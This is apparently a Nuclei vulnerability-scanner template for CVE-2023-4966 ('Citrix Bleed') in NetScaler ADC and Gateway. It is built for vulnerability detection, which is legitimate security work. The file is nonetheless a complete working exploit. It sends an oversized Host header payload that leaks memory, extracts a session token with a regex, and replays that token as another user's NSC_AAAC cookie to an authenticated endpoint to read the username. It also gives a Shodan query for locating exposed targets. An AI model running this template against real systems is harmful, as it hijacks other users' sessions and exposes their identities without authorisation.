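id: CVE-2023-4966

info:
  name: Citrix Bleed - Leaking Session Tokens
  author: DhiyaneshDK
  severity: high
  description: |
    Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.
  reference:
    - https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py
    - https://github.com/Chocapikk/CVE-2023-4966
    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
    - https://x.com/assetnote/status/1716757539323564196?s=20
    - https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4966
    cwe-id: CWE-119,NVD-CWE-noinfo
    epss-score: 0.92267
    epss-percentile: 0.98668
    cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
  metadata:
    verified: "true"
    # Two raw requests below; keep in sync with the length of http[0].raw.
    max-request: 2
    vendor: citrix
    product: netscaler_application_delivery_controller
    shodan-query: 'title:"Citrix Gateway" || title:"Netscaler Gateway"'
  tags: cve,2023,citrix,adc,info-leak,kev

variables:
  payload: '{{repeat("a", 24812)}}'
  str: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      # Request 1: the probe; the response body is inspected by the body_1
      # matchers and by the internal "session" extractor.
      - |+
        GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
        {{str}}: {{Hostname}}
        Host: {{payload}}

      # Request 2: confirmation step that replays the value extracted from
      # request 1 as the NSC_AAAC cookie. This touches an authenticated
      # endpoint with a session that is not the scanner's own.
      - |+
        POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
        Host: {{Hostname}}
        Cookie: NSC_AAAC={{session}}
        User-Agent: python-requests/2.25.1
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Length: 0

    # Raw requests are sent without client-side normalisation.
    unsafe: true
    extractors:
      # Capture group 1 of the first response body feeds {{session}} in
      # request 2; internal extractors are not written to scan output.
      - type: regex
        name: session
        part: body_1
        group: 1
        regex:
          - '\b([a-f0-9]{65})\b'
        internal: true

      # Non-internal: the first alphanumeric token of the second response
      # body (presumably the username bound to the replayed session) is
      # written to scan output, so results should be handled as sensitive.
      - type: regex
        part: body_2
        regex:
          - '([a-z0-9]+)'

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'NSC_AAAC='
          - '{"issuer":'
        condition: and

      - type: word
        part: header_2
        words:
          - "text/plain"
# NOTE(review): this digest signs the template bytes as originally published;
# any edit to the content above (including reformatting or the description
# fix) invalidates it, so the template will be treated as unsigned until it
# is re-signed (nuclei -sign) or the line is dropped.
# digest: 490a0046304402207aa7e756da1c4be5727458d2eb2ef1a52f019fd2e87031ac0604c6ba6f243de202204d4cb5e65870d14b46ef1023b0f6d501aaba5ab7dd6d185a4d868aa0eb9c2bc0:922c64590222798bb761d5b6d8e72950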